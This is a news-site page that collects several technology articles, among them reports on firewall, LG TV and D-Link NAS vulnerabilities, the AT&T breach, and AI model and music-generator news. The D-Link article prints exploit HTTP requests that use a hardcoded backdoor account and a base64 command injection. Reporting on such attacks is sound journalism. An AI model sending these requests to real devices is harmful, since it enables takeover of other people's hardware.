Biz & IT

“highly-capable”-hackers-root-corporate-networks-by-exploiting-firewall-0-day

“Highly capable” hackers root corporate networks by exploiting firewall 0-day

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Highly capable hackers are rooting multiple corporate networks by exploiting a maximum-severity zero-day vulnerability in a firewall product from Palo Alto Networks, researchers said Friday.

The vulnerability, which has been under active exploitation for at least two weeks now, allows the hackers with no authentication to execute malicious code with root privileges, the highest possible level of system access, researchers said. The extent of the compromise, along with the ease of exploitation, has earned the CVE-2024-3400 vulnerability the maximum severity rating of 10.0. The ongoing attacks are the latest in a rash of attacks aimed at firewalls, VPNs, and file-transfer appliances, which are popular targets because of their wealth of vulnerabilities and direct pipeline into the most sensitive parts of a network.

“Highly capable” UTA0218 likely to be joined by others

The zero-day is present in PAN-OS 10.2, PAN-OS 11.0, and/or PAN-OS 11.1 firewalls when they are configured to use both the GlobalProtect gateway and device telemetry. Palo Alto Networks has yet to patch the vulnerability but is urging affected customers to follow the workaround and mitigation guidance provided here. The advice includes enabling Threat ID 95187 for those with subscriptions to the company’s Threat Prevention service and ensuring vulnerability protection has been applied to their GlobalProtect interface. When that’s not possible, customers should temporarily disable telemetry until a patch is available.

Volexity, the security firm that discovered the zero-day attacks, said that it’s currently unable to tie the attackers to any previously known groups. However, based on the resources required and the organizations targeted, they are “highly capable” and likely backed by a nation-state. So far, only a single threat group—which Volexity tracks as UTA0218—is known to be leveraging the vulnerability in limited attacks. The company warned that as new groups learn of the vulnerability, CVE-2024-3400, is likely to come under mass exploitation, just as recent zero-days affecting products from the likes of Ivanti, Atlassian, Citrix, and Progress have in recent months.

“As with previous public disclosures of vulnerabilities in these kinds of devices, Volexity assesses that it is likely a spike in exploitation will be observed over the next few days by UTA0218 and potentially other threat actors who may develop exploits for this vulnerability,” company researchers wrote Friday. “This spike in activity will be driven by the urgency of this window of access closing due to mitigations and patches being deployed. It is therefore imperative that organizations act quickly to deploy recommended mitigations and perform compromise reviews of their devices to check whether further internal investigation of their networks is required.”

The earliest attacks Volexity has seen took place on March 26 in what company researchers suspect was UTA0218 testing the vulnerability by placing zero-byte files on firewall devices to validate exploitability. On April 7, the researchers observed the group trying unsuccessfully to install a backdoor on a customer’s firewall. Three days later, the group’s attacks were successfully deploying malicious payloads. Since then, the threat group has deployed custom, never-before-seen post-exploitation malware. The backdoor, which is written in the Python language, allows the attackers to use specially crafted network requests to execute additional commands on hacked devices.

“Highly capable” hackers root corporate networks by exploiting firewall 0-day Read More »

words-are-flowing-out-like-endless-rain:-recapping-a-busy-week-of-llm-news

Words are flowing out like endless rain: Recapping a busy week of LLM news

many things frequently —

Gemini 1.5 Pro launch, new version of GPT-4 Turbo, new Mistral model, and more.

An image of a boy amazed by flying letters.

Enlarge / An image of a boy amazed by flying letters.

Some weeks in AI news are eerily quiet, but during others, getting a grip on the week’s events feels like trying to hold back the tide. This week has seen three notable large language model (LLM) releases: Google Gemini Pro 1.5 hit general availability with a free tier, OpenAI shipped a new version of GPT-4 Turbo, and Mistral released a new openly licensed LLM, Mixtral 8x22B. All three of those launches happened within 24 hours starting on Tuesday.

With the help of software engineer and independent AI researcher Simon Willison (who also wrote about this week’s hectic LLM launches on his own blog), we’ll briefly cover each of the three major events in roughly chronological order, then dig into some additional AI happenings this week.

Gemini Pro 1.5 general release

On Tuesday morning Pacific time, Google announced that its Gemini 1.5 Pro model (which we first covered in February) is now available in 180-plus countries, excluding Europe, via the Gemini API in a public preview. This is Google’s most powerful public LLM so far, and it’s available in a free tier that permits up to 50 requests a day.

It supports up to 1 million tokens of input context. As Willison notes in his blog, Gemini 1.5 Pro’s API price at $7/million input tokens and $21/million output tokens costs a little less than GPT-4 Turbo (priced at $10/million in and $30/million out) and more than Claude 3 Sonnet (Anthropic’s mid-tier LLM, priced at $3/million in and $15/million out).

Notably, Gemini 1.5 Pro includes native audio (speech) input processing that allows users to upload audio or video prompts, a new File API for handling files, the ability to add custom system instructions (system prompts) for guiding model responses, and a JSON mode for structured data extraction.

“Majorly Improved” GPT-4 Turbo launch

A GPT-4 Turbo performance chart provided by OpenAI.

Enlarge / A GPT-4 Turbo performance chart provided by OpenAI.

Just a bit later than Google’s 1.5 Pro launch on Tuesday, OpenAI announced that it was rolling out a “majorly improved” version of GPT-4 Turbo (a model family originally launched in November) called “gpt-4-turbo-2024-04-09.” It integrates multimodal GPT-4 Vision processing (recognizing the contents of images) directly into the model, and it initially launched through API access only.

Then on Thursday, OpenAI announced that the new GPT-4 Turbo model had just become available for paid ChatGPT users. OpenAI said that the new model improves “capabilities in writing, math, logical reasoning, and coding” and shared a chart that is not particularly useful in judging capabilities (that they later updated). The company also provided an example of an alleged improvement, saying that when writing with ChatGPT, the AI assistant will use “more direct, less verbose, and use more conversational language.”

The vague nature of OpenAI’s GPT-4 Turbo announcements attracted some confusion and criticism online. On X, Willison wrote, “Who will be the first LLM provider to publish genuinely useful release notes?” In some ways, this is a case of “AI vibes” again, as we discussed in our lament about the poor state of LLM benchmarks during the debut of Claude 3. “I’ve not actually spotted any definite differences in quality [related to GPT-4 Turbo],” Willison told us directly in an interview.

The update also expanded GPT-4’s knowledge cutoff to April 2024, although some people are reporting it achieves this through stealth web searches in the background, and others on social media have reported issues with date-related confabulations.

Mistral’s mysterious Mixtral 8x22B release

An illustration of a robot holding a French flag, figuratively reflecting the rise of AI in France due to Mistral. It's hard to draw a picture of an LLM, so a robot will have to do.

Enlarge / An illustration of a robot holding a French flag, figuratively reflecting the rise of AI in France due to Mistral. It’s hard to draw a picture of an LLM, so a robot will have to do.

Not to be outdone, on Tuesday night, French AI company Mistral launched its latest openly licensed model, Mixtral 8x22B, by tweeting a torrent link devoid of any documentation or commentary, much like it has done with previous releases.

The new mixture-of-experts (MoE) release weighs in with a larger parameter count than its previously most-capable open model, Mixtral 8x7B, which we covered in December. It’s rumored to potentially be as capable as GPT-4 (In what way, you ask? Vibes). But that has yet to be seen.

“The evals are still rolling in, but the biggest open question right now is how well Mixtral 8x22B shapes up,” Willison told Ars. “If it’s in the same quality class as GPT-4 and Claude 3 Opus, then we will finally have an openly licensed model that’s not significantly behind the best proprietary ones.”

This release has Willison most excited, saying, “If that thing really is GPT-4 class, it’s wild, because you can run that on a (very expensive) laptop. I think you need 128GB of MacBook RAM for it, twice what I have.”

The new Mixtral is not listed on Chatbot Arena yet, Willison noted, because Mistral has not released a fine-tuned model for chatting yet. It’s still a raw, predict-the-next token LLM. “There’s at least one community instruction tuned version floating around now though,” says Willison.

Chatbot Arena Leaderboard shake-ups

A Chatbot Arena Leaderboard screenshot taken on April 12, 2024.

Enlarge / A Chatbot Arena Leaderboard screenshot taken on April 12, 2024.

Benj Edwards

This week’s LLM news isn’t limited to just the big names in the field. There have also been rumblings on social media about the rising performance of open source models like Cohere’s Command R+, which reached position 6 on the LMSYS Chatbot Arena Leaderboard—the highest-ever ranking for an open-weights model.

And for even more Chatbot Arena action, apparently the new version of GPT-4 Turbo is proving competitive with Claude 3 Opus. The two are still in a statistical tie, but GPT-4 Turbo recently pulled ahead numerically. (In March, we reported when Claude 3 first numerically pulled ahead of GPT-4 Turbo, which was then the first time another AI model had surpassed a GPT-4 family model member on the leaderboard.)

Regarding this fierce competition among LLMs—of which most of the muggle world is unaware and will likely never be—Willison told Ars, “The past two months have been a whirlwind—we finally have not just one but several models that are competitive with GPT-4.” We’ll see if OpenAI’s rumored release of GPT-5 later this year will restore the company’s technological lead, we note, which once seemed insurmountable. But for now, Willison says, “OpenAI are no longer the undisputed leaders in LLMs.”

Words are flowing out like endless rain: Recapping a busy week of LLM news Read More »

intel’s-“gaudi-3”-ai-accelerator-chip-may-give-nvidia’s-h100-a-run-for-its-money

Intel’s “Gaudi 3” AI accelerator chip may give Nvidia’s H100 a run for its money

Adventures in Matrix Multiplication —

Intel claims 50% more speed when running AI language models vs. the market leader.

An Intel handout photo of the Gaudi 3 AI accelerator.

Enlarge / An Intel handout photo of the Gaudi 3 AI accelerator.

On Tuesday, Intel revealed a new AI accelerator chip called Gaudi 3 at its Vision 2024 event in Phoenix. With strong claimed performance while running large language models (like those that power ChatGPT), the company has positioned Gaudi 3 as an alternative to Nvidia’s H100, a popular data center GPU that has been subject to shortages, though apparently that is easing somewhat.

Compared to Nvidia’s H100 chip, Intel projects a 50 percent faster training time on Gaudi 3 for both OpenAI’s GPT-3 175B LLM and the 7-billion parameter version of Meta’s Llama 2. In terms of inference (running the trained model to get outputs), Intel claims that its new AI chip delivers 50 percent faster performance than H100 for Llama 2 and Falcon 180B, which are both relatively popular open-weights models.

Intel is targeting the H100 because of its high market share, but the chip isn’t Nvidia’s most powerful AI accelerator chip in the pipeline. Announcements of the H200 and the Blackwell B200 have since surpassed the H100 on paper, but neither of those chips is out yet (the H200 is expected in the second quarter of 2024—basically any day now).

Meanwhile, the aforementioned H100 supply issues have been a major headache for tech companies and AI researchers who have to fight for access to any chips that can train AI models. This has led several tech companies like Microsoft, Meta, and OpenAI (rumor has it) to seek their own AI-accelerator chip designs, although that custom silicon is typically manufactured by either Intel or TSMC. Google has its own line of tensor processing units (TPUs) that it has been using internally since 2015.

Given those issues, Intel’s Gaudi 3 may be a potentially attractive alternative to the H100 if Intel can hit an ideal price (which Intel has not provided, but an H100 reportedly costs around $30,000–$40,000) and maintain adequate production. AMD also manufactures a competitive range of AI chips, such as the AMD Instinct MI300 Series, that sell for around $10,000–$15,000.

Gaudi 3 performance

An Intel handout featuring specifications of the Gaudi 3 AI accelerator.

Enlarge / An Intel handout featuring specifications of the Gaudi 3 AI accelerator.

Intel says the new chip builds upon the architecture of its predecessor, Gaudi 2, by featuring two identical silicon dies connected by a high-bandwidth connection. Each die contains a central cache memory of 48 megabytes, surrounded by four matrix multiplication engines and 32 programmable tensor processor cores, bringing the total cores to 64.

The chipmaking giant claims that Gaudi 3 delivers double the AI compute performance of Gaudi 2 using 8-bit floating-point infrastructure, which has become crucial for training transformer models. The chip also offers a fourfold boost for computations using the BFloat 16-number format. Gaudi 3 also features 128GB of the less expensive HBMe2 memory capacity (which may contribute to price competitiveness) and features 3.7TB of memory bandwidth.

Since data centers are well-known to be power hungry, Intel emphasizes the power efficiency of Gaudi 3, claiming 40 percent greater inference power-efficiency across Llama 7B and 70B parameters, and Falcon 180B parameter models compared to Nvidia’s H100. Eitan Medina, chief operating officer of Intel’s Habana Labs, attributes this advantage to Gaudi’s large-matrix math engines, which he claims require significantly less memory bandwidth compared to other architectures.

Gaudi vs. Blackwell

An Intel handout photo of the Gaudi 3 AI accelerator.

Enlarge / An Intel handout photo of the Gaudi 3 AI accelerator.

Last month, we covered the splashy launch of Nvidia’s Blackwell architecture, including the B200 GPU, which Nvidia claims will be the world’s most powerful AI chip. It seems natural, then, to compare what we know about Nvidia’s highest-performing AI chip to the best of what Intel can currently produce.

For starters, Gaudi 3 is being manufactured using TSMC’s N5 process technology, according to IEEE Spectrum, narrowing the gap between Intel and Nvidia in terms of semiconductor fabrication technology. The upcoming Nvidia Blackwell chip will use a custom N4P process, which reportedly offers modest performance and efficiency improvements over N5.

Gaudi 3’s use of HBM2e memory (as we mentioned above) is notable compared to the more expensive HBM3 or HBM3e used in competing chips, offering a balance of performance and cost-efficiency. This choice seems to emphasize Intel’s strategy to compete not only on performance but also on price.

As far as raw performance comparisons between Gaudi 3 and the B200, that can’t be known until the chips have been released and benchmarked by a third party.

As the race to power the tech industry’s thirst for AI computation heats up, IEEE Spectrum notes that the next generation of Intel’s Gaudi chip, code-named Falcon Shores, remains a point of interest. It also remains to be seen whether Intel will continue to rely on TSMC’s technology or leverage its own foundry business and upcoming nanosheet transistor technology to gain a competitive edge in the AI accelerator market.

Intel’s “Gaudi 3” AI accelerator chip may give Nvidia’s H100 a run for its money Read More »

at&t:-data-breach-affects-73-million-or-51-million-customers-no,-we-won’t-explain.

AT&T: Data breach affects 73 million or 51 million customers. No, we won’t explain.

“SECURITY IS IMPORTANT TO US” —

When the data was published in 2021, the company said it didn’t belong to its customers.

AT&T: Data breach affects 73 million or 51 million customers. No, we won’t explain.

Getty Images

AT&T is notifying millions of current or former customers that their account data has been compromised and published last month on the dark web. Just how many millions, the company isn’t saying.

In a mandatory filing with the Maine Attorney General’s office, the telecommunications company said 51.2 million account holders were affected. On its corporate website, AT&T put the number at 73 million. In either event, compromised data included one or more of the following: full names, email addresses, mailing addresses, phone numbers, social security numbers, dates of birth, AT&T account numbers, and AT&T passcodes. Personal financial information and call history didn’t appear to be included, AT&T said, and data appeared to be from June 2019 or earlier.

The disclosure on the AT&T site said the 73 million affected customers comprised 7.6 million current customers and 65.4 million former customers. The notification said AT&T has reset the account PINs of all current customers and is notifying current and former customers by mail. AT&T representatives haven’t explained why the letter filed with the Maine AG lists 51.2 million affected and the disclosure on its site lists 73 million.

According to a March 30 article published by TechCrunch, a security researcher said the passcodes were stored in an encrypted format that could easily be decrypted. Bleeping Computer reported in 2021 that more than 70 million records containing AT&T customer data was put up for sale that year for $1 million. AT&T, at the time, told the news site that the amassed data didn’t belong to its customers and that the company’s systems had not been breached.

Last month, after the same data reappeared online, Bleeping Computer and TechCrunch confirmed that the data belonged to AT&T customers, and the company finally acknowledged the connection. AT&T has yet to say how the information was breached or why it took more than two years from the original date of publication to confirm that it belonged to its customers.

Given the length of time the data has been available, the damage that’s likely to result from the most recent publication is likely to be minimal. That said, anyone who is or was an AT&T customer should be on the lookout for scams that attempt to capitalize on the leaked data. AT&T is offering one year of free identity theft protection.

AT&T: Data breach affects 73 million or 51 million customers. No, we won’t explain. Read More »

new-ai-music-generator-udio-synthesizes-realistic-music-on-demand

New AI music generator Udio synthesizes realistic music on demand

Battle of the AI bands —

But it still needs trial and error to generate high-quality results.

A screenshot of AI-generated songs listed on Udio on April 10, 2024.

Enlarge / A screenshot of AI-generated songs listed on Udio on April 10, 2024.

Benj Edwards

Between 2002 and 2005, I ran a music website where visitors could submit song titles that I would write and record a silly song around. In the liner notes for my first CD release in 2003, I wrote about a day when computers would potentially put me out of business, churning out music automatically at a pace I could not match. While I don’t actively post music on that site anymore, that day is almost here.

On Wednesday, a group of ex-DeepMind employees launched Udio, a new AI music synthesis service that can create novel high-fidelity musical audio from written prompts, including user-provided lyrics. It’s similar to Suno, which we covered on Monday. With some key human input, Udio can create facsimiles of human-produced music in genres like country, barbershop quartet, German pop, classical, hard rock, hip hop, show tunes, and more. It’s currently free to use during a beta period.

Udio is also freaking out some musicians on Reddit. As we mentioned in our Suno piece, Udio is exactly the kind of AI-powered music generation service that over 200 musical artists were afraid of when they signed an open protest letter last week.

But as impressive as the Udio songs first seem from a technical AI-generation standpoint (not necessarily judging by musical merit), its generation capability isn’t perfect. We experimented with its creation tool and the results felt less impressive than those created by Suno. The high-quality musical samples showcased on Udio’s site likely resulted from a lot of creative human input (such as human-written lyrics) and cherry-picking the best compositional parts of songs out of many generations. In fact, Udio lays out a five-step workflow to build a 1.5-minute-long song in a FAQ.

For example, we created an Ars Technica “Moonshark” song on Udio using the same prompt as one we used previously with Suno. In its raw form, the results sound half-baked and almost nightmarish (here is the Suno version for comparison). It’s also a lot shorter by default at 32 seconds compared to Suno’s 1-minute and 32-second output. But Udio allows songs to be extended, or you can try generating a poor result again with different prompts for different results.

After registering a Udio account, anyone can create a track by entering a text prompt that can include lyrics, a story direction, and musical genre tags. Udio then tackles the task in two stages. First, it utilizes a large language model (LLM) similar to ChatGPT to generate lyrics (if necessary) based on the provided prompt. Next, it synthesizes music using a method that Udio does not disclose, but it’s likely a diffusion model, similar to Stability AI’s Stable Audio.

From the given prompt, Udio’s AI model generates two distinct song snippets for you to choose from. You can then publish the song for the Udio community, download the audio or video file to share on other platforms, or directly share it on social media. Other Udio users can also remix or build on existing songs. Udio’s terms of service say that the company claims no rights over the musical generations and that they can be used for commercial purposes.

Although the Udio team has not revealed the specific details of its model or training data (which is likely filled with copyrighted material), it told Tom’s Guide that the system has built-in measures to identify and block tracks that too closely resemble the work of specific artists, ensuring that the generated music remains original.

And that brings us back to humans, some of whom are not taking the onset of AI-generated music very well. “I gotta be honest, this is depressing as hell,” wrote one Reddit commenter in a thread about Udio. “I’m still broadly optimistic that music will be fine in the long run somehow. But like, why do this? Why automate art?”

We’ll hazard an answer by saying that replicating art is a key target for AI research because the results can be inaccurate and imprecise and still seem notable or gee-whiz amazing, which is a key characteristic of generative AI. It’s flashy and impressive-looking while allowing for a general lack of quantitative rigor. We’ve already seen AI come for still images, video, and text with varied results regarding representative accuracy. Fully composed musical recordings seem to be next on the list of AI hills to (approximately) conquer, and the competition is heating up.

New AI music generator Udio synthesizes realistic music on demand Read More »

thousands-of-lg-tvs-are-vulnerable-to-takeover—here’s-how-to-ensure-yours-isn’t-one

Thousands of LG TVs are vulnerable to takeover—here’s how to ensure yours isn’t one

Thousands of LG TVs are vulnerable to takeover—here’s how to ensure yours isn’t one

Getty Images

As many as 91,000 LG TVs face the risk of being commandeered unless they receive a just-released security update patching four critical vulnerabilities discovered late last year.

The vulnerabilities are found in four LG TV models that collectively comprise slightly more than 88,000 units around the world, according to results returned by the Shodan search engine for Internet-connected devices. The vast majority of those units are located in South Korea, followed by Hong Kong, the US, Sweden, and Finland. The models are:

  • LG43UM7000PLA running webOS 4.9.7 – 5.30.40
  • OLED55CXPUA running webOS 5.5.0 – 04.50.51
  • OLED48C1PUB running webOS 6.3.3-442 (kisscurl-kinglake) – 03.36.50
  • OLED55A23LA running webOS 7.3.1-43 (mullet-mebin) – 03.33.85

Starting Wednesday, updates are available through these devices’ settings menu.

Got root?

According to Bitdefender—the security firm that discovered the vulnerabilities—malicious hackers can exploit them to gain root access to the devices and inject commands that run at the OS level. The vulnerabilities, which affect internal services that allow users to control their sets using their phones, make it possible for attackers to bypass authentication measures designed to ensure only authorized devices can make use of the capabilities.

“These vulnerabilities let us gain root access on the TV after bypassing the authorization mechanism,” Bitdefender researchers wrote Tuesday. “Although the vulnerable service is intended for LAN access only, Shodan, the search engine for Internet-connected devices, identified over 91,000 devices that expose this service to the Internet.”

The key vulnerability making these threats possible resides in a service that allows TVs to be controlled using LG’s ThinkQ smartphone app when it’s connected to the same local network. The service is designed to require the user to enter a PIN code to prove authorization, but an error allows someone to skip this verification step and become a privileged user. This vulnerability is tracked as CVE-2023-6317.

Once attackers have gained this level of control, they can go on to exploit three other vulnerabilities, specifically:

  • CVE-2023-6318, which allows the attackers to elevate their access to root
  • CVE-2023-6319, which allows for the injection of OS commands by manipulating a library for showing music lyrics
  • CVE-2023-6320, which lets an attacker inject authenticated commands by manipulating the com.webos.service.connectionmanager/tv/setVlanStaticAddress application interface.

Thousands of LG TVs are vulnerable to takeover—here’s how to ensure yours isn’t one Read More »

elon-musk:-ai-will-be-smarter-than-any-human-around-the-end-of-next-year

Elon Musk: AI will be smarter than any human around the end of next year

smarter than the average bear —

While Musk says superintelligence is coming soon, one critic says prediction is “batsh*t crazy.”

Elon Musk, owner of Tesla and the X (formerly Twitter) platform, attends a symposium on fighting antisemitism titled 'Never Again : Lip Service or Deep Conversation' in Krakow, Poland on January 22nd, 2024. Musk, who was invited to Poland by the European Jewish Association (EJA) has visited the Auschwitz-Birkenau concentration camp earlier that day, ahead of International Holocaust Remembrance Day. (Photo by Beata Zawrzel/NurPhoto)

Enlarge / Elon Musk, owner of Tesla and the X (formerly Twitter) platform on January 22, 2024.

On Monday, Tesla CEO Elon Musk predicted the imminent rise in AI superintelligence during a live interview streamed on the social media platform X. “My guess is we’ll have AI smarter than any one human probably around the end of next year,” Musk said in his conversation with hedge fund manager Nicolai Tangen.

Just prior to that, Tangen had asked Musk, “What’s your take on where we are in the AI race just now?” Musk told Tangen that AI “is the fastest advancing technology I’ve seen of any kind, and I’ve seen a lot of technology.” He described computers dedicated to AI increasing in capability by “a factor of 10 every year, if not every six to nine months.”

Musk made the prediction with an asterisk, saying that shortages of AI chips and high AI power demands could limit AI’s capability until those issues are resolved. “Last year, it was chip-constrained,” Musk told Tangen. “People could not get enough Nvidia chips. This year, it’s transitioning to a voltage transformer supply. In a year or two, it’s just electricity supply.”

But not everyone is convinced that Musk’s crystal ball is free of cracks. Grady Booch, a frequent critic of AI hype on social media who is perhaps best known for his work in software architecture, told Ars in an interview, “Keep in mind that Mr. Musk has a profoundly bad record at predicting anything associated with AI; back in 2016, he promised his cars would ship with FSD safety level 5, and here we are, closing on an a decade later, still waiting.”

Creating artificial intelligence at least as smart as a human (frequently called “AGI” for artificial general intelligence) is often seen as inevitable among AI proponents, but there’s no broad consensus on exactly when that milestone will be reached—or on the exact definition of AGI, for that matter.

“If you define AGI as smarter than the smartest human, I think it’s probably next year, within two years,” Musk added in the interview with Tangen while discussing AGI timelines.

Even with uncertainties about AGI, that hasn’t kept companies from trying. ChatGPT creator OpenAI, which launched with Musk as a co-founder in 2015, lists developing AGI as its main goal. Musk has not been directly associated with OpenAI for years (unless you count a recent lawsuit against the company), but last year, he took aim at the business of large language models by forming a new company called xAI. Its main product, Grok, functions similarly to ChatGPT and is integrated into the X social media platform.

Booch gives credit to Musk’s business successes but casts doubt on his forecasting ability. “Albeit a brilliant if not rapacious businessman, Mr. Musk vastly overestimates both the history as well as the present of AI while simultaneously diminishing the exquisite uniqueness of human intelligence,” says Booch. “So in short, his prediction is—to put it in scientific terms—batshit crazy.”

So when will we get AI that’s smarter than a human? Booch says there’s no real way to know at the moment. “I reject the framing of any question that asks when AI will surpass humans in intelligence because it is a question filled with ambiguous terms and considerable emotional and historic baggage,” he says. “We are a long, long way from understanding the design that would lead us there.”

We also asked Hugging Face AI researcher Dr. Margaret Mitchell to weigh in on Musk’s prediction. “Intelligence … is not a single value where you can make these direct comparisons and have them mean something,” she told us in an interview. “There will likely never be agreement on comparisons between human and machine intelligence.”

But even with that uncertainty, she feels there is one aspect of AI she can more reliably predict: “I do agree that neural network models will reach a point where men in positions of power and influence, particularly ones with investments in AI, will declare that AI is smarter than humans. By end of next year, sure. That doesn’t sound far off base to me.”

Elon Musk: AI will be smarter than any human around the end of next year Read More »

mit-license-text-becomes-viral-“sad-girl”-piano-ballad-generated-by-ai

MIT License text becomes viral “sad girl” piano ballad generated by AI

WARRANTIES OF MERCHANTABILITY —

“Permission is hereby granted” comes from Suno AI engine that creates new songs on demand.

Illustration of a robot singing.

We’ve come a long way since primitive AI music generators in 2022. Today, AI tools like Suno.ai allow any series of words to become song lyrics, including inside jokes (as you’ll see below). On Wednesday, prompt engineer Riley Goodside tweeted an AI-generated song created with the prompt “sad girl with piano performs the text of the MIT License,” and it began to circulate widely in the AI community online.

The MIT License is a famous permissive software license created in the late 1980s, frequently used in open source projects. “My favorite part of this is ~1: 25 it nails ‘WARRANTIES OF MERCHANTABILITY’ with a beautiful Imogen Heap-style glissando then immediately pronounces ‘FITNESS’ as ‘fistiff,'” Goodside wrote on X.

Suno (which means “listen” in Hindi) was formed in 2023 in Cambridge, Massachusetts. It’s the brainchild of Michael Shulman, Georg Kucsko, Martin Camacho, and Keenan Freyberg, who formerly worked at companies like Meta and TikTok. Suno has already attracted big-name partners, such as Microsoft, which announced the integration of an earlier version of the Suno engine into Bing Chat last December. Today, Suno is on v3 of its model, which can create temporally coherent two-minute songs in many different genres.

The company did not reply to our request for an interview by press time. In March, Brian Hiatt of Rolling Stone wrote a profile about Suno that describes the service as a collaboration between OpenAI’s ChatGPT (for lyric writing) and Suno’s music generation model, which some experts think has likely been trained on recordings of copyrighted music without license or artist permission.

It’s exactly this kind of service that upset over 200 musical artists enough last week that they signed an Artist Rights Alliance open letter asking tech companies to stop using AI tools to generate music that could replace human artists.

Considering the unknown provenance of the training data, ownership of the generated songs seems like a complicated question. Suno’s FAQ says that music generated using its free tier remains owned by Suno and can only be used for non-commercial purposes. Paying subscribers reportedly own generated songs “while subscribed to Pro or Premier,” subject to Suno’s terms of service. However, the US Copyright Office took a stance last year that purely AI-generated visual art cannot be copyrighted, and while that standard has not yet been resolved for AI-generated music, it might eventually become official legal policy as well.

The Moonshark song

A screenshot of the Suno.ai website showing lyrics of an AI-generated

Enlarge / A screenshot of the Suno.ai website showing lyrics of an AI-generated “Moonshark” song.

Benj Edwards

While using the service, Suno appears to have no trouble creating unique lyrics based on your prompt (unless you supply your own) and sets those words to stylized genres of music it generates based on its training dataset. It dynamically generates vocals as well, although they include audible aberrations. Suno’s output is not indistinguishable from high-fidelity human-created music yet, but given the pace of progress we’ve seen, that bridge could be crossed within the next year.

To get a sense of what Suno can do, we created an account on the site and prompted the AI engine to create songs about our mascot, Moonshark, and about barbarians with CRTs, two inside jokes at Ars. What’s interesting is that although the AI model aced the task of creating an original song for each topic, both songs start with the same line, “In the depths of the digital domain.” That’s possibly an artifact of whatever hidden prompt Suno is using to instruct ChatGPT when writing the lyrics.

Suno is arguably a fun toy to experiment with and doubtless a milestone in generative AI music tools. But it’s also an achievement tainted by the unresolved ethical issues related to scraping musical work without the artist’s permission. Then there’s the issue of potentially replacing human musicians, which has not been far from the minds of people sharing their own Suno results online. On Monday, AI influencer Ethan Mollick wrote, “I’ve had a song from Suno AI stuck in my head all day. Grim milestone or good one?”

MIT License text becomes viral “sad girl” piano ballad generated by AI Read More »

critical-takeover-vulnerabilities-in-92,000-d-link-devices-under-active-exploitation

Critical takeover vulnerabilities in 92,000 D-Link devices under active exploitation

JUST ADD GET REQUEST —

D-Link won’t be patching vulnerable NAS devices because they’re no longer supported.

Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word

Getty Images

Hackers are actively exploiting a pair of recently discovered vulnerabilities to remotely commandeer network-attached storage devices manufactured by D-Link, researchers said Monday.

Roughly 92,000 devices are vulnerable to the remote takeover exploits, which can be remotely transmitted by sending malicious commands through simple HTTP traffic. The vulnerability came to light two weeks ago. The researcher said they were making the threat public because D-Link said it had no plans to patch the vulnerabilities, which are present only in end-of-life devices, meaning they are no longer supported by the manufacturer.

An ideal recipe

On Monday, researchers said their sensors began detecting active attempts to exploit the vulnerabilities starting over the weekend. Greynoise, one of the organizations reporting the in-the-wild exploitation, said in an email that the activity began around 02: 17 UTC on Sunday. The attacks attempted to download and install one of several pieces of malware on vulnerable devices depending on their specific hardware profile. One such piece of malware is flagged under various names by 40 endpoint protection services.

Security organization Shadowserver has also reported seeing scanning or exploits from multiple IP addresses but didn’t provide additional details.

The vulnerability pair, found in the nas_sharing.cgi programming interface of the vulnerable devices, provide an ideal recipe for remote takeover. The first, tracked as CVE-2024-3272 and carrying a severity rating of 9.8 out of 10, is a backdoor account enabled by credentials hardcoded into the firmware. The second is a command-injection flaw tracked as CVE-2024-3273 and has a severity rating of 7.3. It can be remotely activated with a simple HTTP GET request.

Netsecfish, the researcher who disclosed the vulnerabilities, demonstrated how a hacker could remotely commandeer vulnerable devices by sending a simple set of HTTP requests to them. The code looks like this:

GET /cgi-bin/nas_sharing.cgiuser=messagebus&passwd=&cmd=15&system=

In the exploit example below, the text inside the first red rectangle contains the hardcoded credentials—username messagebus and an empty password field—while the next rectangle contains a malicious command string that has been base64 encoded.

netsecfish

“Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the system, potentially leading to unauthorized access to sensitive information, modification of system configurations, or denial of service conditions,” netsecfish wrote.

Last week, D-Link published an advisory. D-Link confirmed the list of affected devices:

Model Region Hardware Revision End of Service Life

Fixed Firmware Conclusion Last Updated
DNS-320L All Regions All H/W Revisions 05/31/2020 : Link  Not Available Retire & Replace Device

04/01/2024
DNS-325 All Regions All H/W Revisions 09/01/2017 : Link Not Available Retire & Replace Device 04/01/2024
DNS-327L All Regions All H/W Revisions 05/31/2020 : Link

Not Available Retire & Replace Device 04/01/2024
DNS-340L All Regions All H/W Revisions 07/31/2019 : Link Not Available Retire & Replace Device 04/01/2024

According to netsecfish, Internet scans found roughly 92,000 devices that were vulnerable.

netsecfish

According to the Greynoise email, exploits company researchers are seeing look like this:

GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=15&user=messagebus&passwd=&cmd=Y2QgL3RtcDsgcLnNo HTTP/1.1

Other malware invoked in the exploit attempts include:

The best defense against these attacks and others like them is to replace hardware once it reaches end of life. Barring that, users of EoL devices should at least ensure they’re running the most recent firmware. D-Link provides this dedicated support page for legacy devices for owners to locate the latest available firmware. Another effective protection is to disable UPnP and connections from remote Internet addresses unless they’re absolutely necessary and configured correctly.

Critical takeover vulnerabilities in 92,000 D-Link devices under active exploitation Read More »

ivanti-ceo-pledges-to-“fundamentally-transform”-its-hard-hit-security-model

Ivanti CEO pledges to “fundamentally transform” its hard-hit security model

Ivanti exploits in 2024 —

Part of the reset involves AI-powered documentation search and call routing.

Red unlocked icon amidst similar blue icons

Getty Images

Ivanti, the remote-access company whose remote-access products have been battered by severe exploits in recent months, has pledged a “new era,” one that “fundamentally transforms the Ivanti security operating model” backed by “a significant investment” and full board support.

CEO Jeff Abbott’s open letter promises to revamp “core engineering, security, and vulnerability management,” make all products “secure by design,” formalize cyber-defense agency partnerships, and “sharing information and learning with our customers.” Among the details is the company’s promise to improve search abilities in Ivanti’s security resources and documentation portal, “powered by AI,” and an “Interactive Voice Response system” for routing calls and alerting customers about security issues, also “AI-powered.”

Ivanti CEO Jeff Abbott addresses the company’s “broad shift” in its security model.

Ivanti and Abbott seem to have been working on this presentation for a while, so it’s unlikely they could have known it would arrive just days after four new vulnerabilities were disclosed for its Connect Secure and Policy Secure gateway products, two of them rated for high severity. Those vulnerabilities came two weeks after two other vulnerabilities, rated critical, with remote code execution. And those followed “a three-week spree of non-stop exploitation” in early February, one that left security directors scrambling to patch and restore services or, as federal civilian agencies did, rebuild their servers from scratch.

